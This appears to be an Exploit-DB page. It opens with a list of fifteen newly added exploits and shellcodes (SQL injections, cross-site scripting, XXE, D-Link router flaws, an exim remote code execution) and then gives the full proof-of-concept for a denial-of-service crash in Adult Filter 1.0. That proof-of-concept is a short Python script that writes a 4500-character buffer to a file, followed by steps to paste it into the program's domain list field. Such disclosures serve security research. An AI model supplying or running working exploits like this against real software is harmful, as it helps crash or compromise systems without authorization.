
15 changes to exploits/shellcodes Adult Filter 1.0 - Denial of Service (PoC) Microsoft Data Sharing - Local Privilege Escalation (PoC) Webmin 1.5 - Web Brute Force (CGI) exim 4.90 - Remote Code Execution School ERP Pro+Responsive 1.0 - 'fid' SQL Injection SIM-PKH 2.4.1 - 'id' SQL Injection MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection School ERP Pro+Responsive 1.0 - 'fid' SQL Injection SIM-PKH 2.4.1 - 'id' SQL Injection MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection SG ERP 1.0 - 'info' SQL Injection Fifa Master XLS 2.3.2 - 'usw' SQL Injection Axioscloud Sissiweb Registro Elettronico 7.0.0 - 'Error_desc' Cross-Site Scripting LANGO Codeigniter Multilingual Script 1.0 - Cross-Site Scripting Apache OFBiz 16.11.04 - XML External Entity Injection D-Link Routers - Command Injection D-Link Routers - Plaintext Password D-Link Routers - Directory Traversal Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes
27 lines
No EOL
1 KiB
Text
27 lines
No EOL
1 KiB
Text
# Exploit Title: ADULT FILTER 1.0 - Denial of Service (PoC)
|
||
# Date: 2018-10-28
|
||
# Exploit Author: Beren Kuday GÖRÜN
|
||
# Vendor Homepage: http://www.armcode.com/adult-filter/
|
||
# Software Link: http://www.armcode.com/downloads/adult-filter.exe
|
||
# Version: 1.0 (Build 2007-Mar-12)
|
||
# Tested on OS: Windows XP Professional sp3 (ENG)
|
||
|
||
# Steps to Reproduce: Run the python3 exploit script, it will create a new
|
||
# file with the name "boom_for_Adult_Filter.txt". Copy the content of the
|
||
# new file "boom_for_Adult_Filter.txt". Now start the program. When you
|
||
# open the program, select 'Options >> Black Domain List ...' from the
|
||
# menu item. In the window that opens, enter the text in the file you
|
||
# created with python3 script the 'Add the domain list' section.
|
||
# Press the 'Add' button and then press the 'OK' button.
|
||
# And see a crash!
|
||
|
||
buffer = "A" * 4500
|
||
|
||
try:
|
||
file = open("boom_for_Adult_Filter.txt","w")
|
||
file.write(buffer)
|
||
file.close()
|
||
print("[*] Ready for Denial of Service")
|
||
|
||
except:
|
||
print("[*] Error: Failed to create file") |